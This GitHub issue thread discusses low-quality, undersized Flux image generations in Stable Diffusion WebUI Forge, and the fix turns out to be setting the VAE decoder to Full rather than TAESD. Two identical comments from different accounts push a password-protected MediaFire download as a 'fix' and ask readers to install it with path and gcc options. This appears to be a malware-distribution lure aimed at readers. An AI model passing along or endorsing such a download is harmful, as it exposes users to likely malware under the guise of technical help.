### ISSUE TITLE
Generations very low quality

### ISSUE THREAD

**Issue by forReason** [lllyasviel/stable-diffusion-webui-forge#1527]
I am using Flux dev from hugging face:
![image](https://github.com/user-attachments/assets/648d5dbe-2266-4237-aec9-c7305a1b4029)

for some reasons, my generations end up quite "unrefined" and low res. this "should be" 1024 x 1024:
this is supposed to be a 500x500 px image: 
![image](https://github.com/user-attachments/assets/0cca2f5e-27ca-4586-ac59-1db284d9cba6)

but its not only the resolution is icorrect:
this is supposed to be a 2000x2000 pixle. it is bigger than the other one, but the quality is also garbage:
![00004-3548657369](https://github.com/user-attachments/assets/d421737f-8f06-4f80-9157-e7ffd1911f8c)

this does not happen when using the flux cli sample from huggingface.
as a comparison, this is the hello world result when running the model directly through cli:
![flux-dev](https://github.com/user-attachments/assets/77b82651-6b06-40dc-8c3e-9548502cca7a)

**Comment by danilomaiaweb** [comment]
Here my image on Forge using the model Flux.1-Schnell Merged with Flux.1-Dev bnb-nf4 Fp8 4 steps (https://civitai.com/models/628862?modelVersionId=764659)

Parameters, with only 6 steps. Time taken: 33.0 sec
![image](https://github.com/user-attachments/assets/01859707-5dea-4b0d-bafe-80188858e27a)

Imagem result:
![00119-26-08-2024 - 963949254](https://github.com/user-attachments/assets/83e8623a-2fd6-41dc-81a7-9750109a0024)

**Comment by danilomaiaweb** [comment]
With LORA, 8 steps, Euler Normal, Time taken: 34.5 sec.

![image](https://github.com/user-attachments/assets/f060862c-6114-4207-8124-bdea9182e6c5)
![00122-26-08-2024 - 966098438](https://github.com/user-attachments/assets/3cd5cd59-3572-4d64-b50e-f1f950f3a21b)

**Comment by lllyasviel** [comment]
@forReason give full console log

**Comment by danilomaiaweb** [comment]
Other image with other prompt and lora in 0.2, 8 steps, etc..
![image](https://github.com/user-attachments/assets/37866ef6-7230-48c5-8f0d-044998f5f568)

![00125-26-08-2024 - 4277293921](https://github.com/user-attachments/assets/944e9c98-dd2e-4857-ad2c-bf6379eb748e)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by forReason** [comment]
uhhhm, I guess there is some ai botting going on?

anyways. @ [danilomaiaweb](https://github.com/danilomaiaweb) 
your interface seems vastly different than mine. I have tried to yopy your settings as closely as possible:
![image](https://github.com/user-attachments/assets/15de4ec2-6d8d-40d6-a68a-98e52744431b)

![00005-3819269829](https://github.com/user-attachments/assets/cd29b8f3-e814-436f-9807-9afa713dca83)
the resolution is roughly smaller than what I requested by a factor of 10. additionally the image shows jpeg like artefacts with very high compression and the image overall seems blurred.

compare that to a lower res image i've generated using the fluxpipeline cli on my raspberry pie:
![flux-dev](https://github.com/user-attachments/assets/3a853a74-4c17-47e3-853f-c9f6226176d6)

----
Logs:
this is the request as in logs.csv. The requested resolution looks good to me:
```
"hyper realistic photo of a yellow kitten holding a sign that says ""hello world""",3819269829,584,1040,Euler,1,20,00005-3819269829.png,,flux1-dev,3f97fdc57a
```

furthermore, attached is the cmd output of forge, from start -> set settings -> generate image:

[console out.txt](https://github.com/user-attachments/files/16759967/console.out.txt)

**Comment by danilomaiaweb** [comment]
> uhhhm, acho que há algum bot de IA acontecendo?
> 
> de qualquer maneira. @ [danilomaiaweb](https://github.com/danilomaiaweb) sua interface parece muito diferente da minha. Tentei copiar suas configurações o mais próximo possível: ![imagem](https://private-user-images.githubusercontent.com/12736950/361745544-15de4ec2-6d8d-40d6-a68a-98e52744431b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MDg4NTAsIm5iZiI6MTcyNDgwODU1MCwicGF0aCI6Ii8xMjczNjk1MC8zNjE3NDU1NDQtMTVkZTRlYzItNmQ4ZC00MGQ2LWE2OGEtOThlNTI3NDQ0MzFiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDAxMjkxMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTIyNTZhOGU0MGY4NDUyMzcwNmQ5NmNiMzZiZWY1NzUxZDBjNjY0Yzk1MTQxYTNlYzU1YjkzZWU0YmNhZGU1ZmYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.Lua1CAmX_YC9SXflE7s-NjO0R68q50-JnXKzqLHyeT0)
> 
> ![00005-3819269829](https://private-user-images.githubusercontent.com/12736950/361745870-cd29b8f3-e814-436f-9807-9afa713dca83.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MDg4NTAsIm5iZiI6MTcyNDgwODU1MCwicGF0aCI6Ii8xMjczNjk1MC8zNjE3NDU4NzAtY2QyOWI4ZjMtZTgxNC00MzZmLTk4MDctOWFmYTcxM2RjYTgzLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDAxMjkxMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYyOGFmYzc5YWJkNTg0MDc2MmQwZjYxOGRiZmI0NTYwNDFhN2JmNmNmZGVjOWE3ZjI2ZDM4MWFlMjNhNDEwMDEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.IlwZxKHcrwagAb4Q3ihdhQEc765pRoNYaYX524FkMso) a resolução é aproximadamente menor do que o que solicitei por um fator de 10. Além disso, a imagem mostra artefatos semelhantes a JPEG com compactação muito alta e a imagem em geral parece borrada.
> 
> Compare isso com uma imagem de resolução mais baixa que gerei usando o Fluxpipeline CLI na minha torta de framboesa: ![desenvolvimento de fluxo](https://private-user-images.githubusercontent.com/12736950/361746314-3a853a74-4c17-47e3-853f-c9f6226176d6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MDg4NTAsIm5iZiI6MTcyNDgwODU1MCwicGF0aCI6Ii8xMjczNjk1MC8zNjE3NDYzMTQtM2E4NTNhNzQtNGMxNy00N2UzLTg1M2YtYzlmNjIyNjE3NmQ2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDAxMjkxMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTFmMWIxZTU3M2VmZDIyN2RkNWIxYjdlZjNiNzIyNzliNTBlNjY2ZmMzNTkzNGY2M2NjYTExMzA3YmY2YjdmZTYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.6o2VRsPnfbG0WD-F69QgJvzFHXvFzliYgt7hhPe3jJc)
> 
> @lllyasviel c Logs: this is the request as in logs.csv. The requested resolution looks good to me:
> 
> ```
> "hyper realistic photo of a yellow kitten holding a sign that says ""hello world""",3819269829,584,1040,Euler,1,20,00005-3819269829.png,,flux1-dev,3f97fdc57a
> ```
> 
> furthermore, attached is the cmd output of forge, from start -> set settings -> generate image:
> 
> [console out.txt](https://github.com/user-attachments/files/16759967/console.out.txt)

The only thing I changed in my interface was the CSS which I made a little more customized.

And also I'm using a different model. I use a merged model (https://civitai.com/models/628862?modelVersionId=764659) and in creation I use between 6 and 8 steps, Euler Mormal

**Comment by danilomaiaweb** [comment]
> The only thing that stood out in your settings was VAE Decoder: TAESD And sure enough, setting it caused my outputs to be tiny as well. ![00038-2187157941](https://private-user-images.githubusercontent.com/13288923/361803898-e5cabd0f-6834-4de7-9185-7a7a7cb4cd27.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MDkyODIsIm5iZiI6MTcyNDgwODk4MiwicGF0aCI6Ii8xMzI4ODkyMy8zNjE4MDM4OTgtZTVjYWJkMGYtNjgzNC00ZGU3LTkxODUtN2E3YTdjYjRjZDI3LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDAxMzYyMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWM3MzQxOWY2ZTM0ZDk1NjIwMTBkNDRhOGVkYzMwNDhhOGVlZDc1NGY3Yjk2ZDQ5OTIyZDM5MDEwOGNkYWJlYmUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.1UBKc91hqmWSpt3gyU2T2xo1Gq0WiEciiaZ8PeJJy0M)
> 
> So, set it to Full under VAE category in the settings, this is a separate setting and you can use TAESD in Live Previews normally. Using Full renders a full size image: ![00039-2187157941](https://private-user-images.githubusercontent.com/13288923/361804808-2a496c3c-f05d-4982-a390-dbb274132448.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MDkyODIsIm5iZiI6MTcyNDgwODk4MiwicGF0aCI6Ii8xMzI4ODkyMy8zNjE4MDQ4MDgtMmE0OTZjM2MtZjA1ZC00OTgyLWEzOTAtZGJiMjc0MTMyNDQ4LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDAxMzYyMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTQ2MzBiZTZhYWZmYjJlYWQyNGQzOWI3NjcyZTEzMTZmYjI2M2QxMjFmM2NhZDFmNzIzOGQ5YzJhNzhkNmRlZTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.y3ICiUoPf8gyhOsSpNgrGVhH4-sj2KZJjhe7_yQfaFY)


Excuse my ignorance, but could you explain this better?
Are you referring to this?
![image](https://github.com/user-attachments/assets/61f13176-bf73-4999-b79c-3c678db4b79b)

I still don't quite understand all these settings.
Your image is perfect, could you share the model settings, steps, etc.?
I'll try to reproduce it here to see if it comes out with the same quality.

Thank in advance
Big hug here from Brazil

**Comment by HMRMike** [comment]
> Excuse my ignorance, but could you explain this better? Are you referring to this? ![image](https://private-user-
>
> I still don't quite understand all these settings. Your image is perfect, could you share the model settings, steps, etc.? I'll try to reproduce it here to see if it comes out with the same quality.
> 
> Thank in advance Big hug here from Brazil

Yes, this is exactly the setting. It should be fine now (just remember to hit the save button at the top).

If you download my image as PNG it should still have embedded parameters in it, so drag it to the "PNG Info" tab, less work copying stuff that way.
![image](https://github.com/user-attachments/assets/12fa71f1-5d40-462c-b200-bb40d949fdd7)
I just used whatever model I had loaded at the time, you don't need to bother to download the exact one as they are similar enough. For the seed, I use "Random number generator source" set to CPU because using GPU will cause different results on different models of GPUs- so set it to CPU if you want to ensure the exact result.
![image](https://github.com/user-attachments/assets/af341115-c7f5-4e59-9ba9-c863994f8f34)
